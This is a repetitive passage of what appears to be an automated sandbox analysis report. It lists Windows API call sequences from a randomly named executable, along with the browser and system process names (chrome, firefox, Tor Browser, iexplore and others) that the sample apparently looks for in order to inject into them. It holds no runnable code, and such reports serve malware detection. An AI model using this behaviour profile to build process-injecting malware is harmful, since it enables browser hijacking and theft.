A,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe5_2_02F71900
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_02F63610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_02F63610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_02F63610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_025678A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_025678A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_025678A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_02566CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_02566CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_02566CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_02566CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA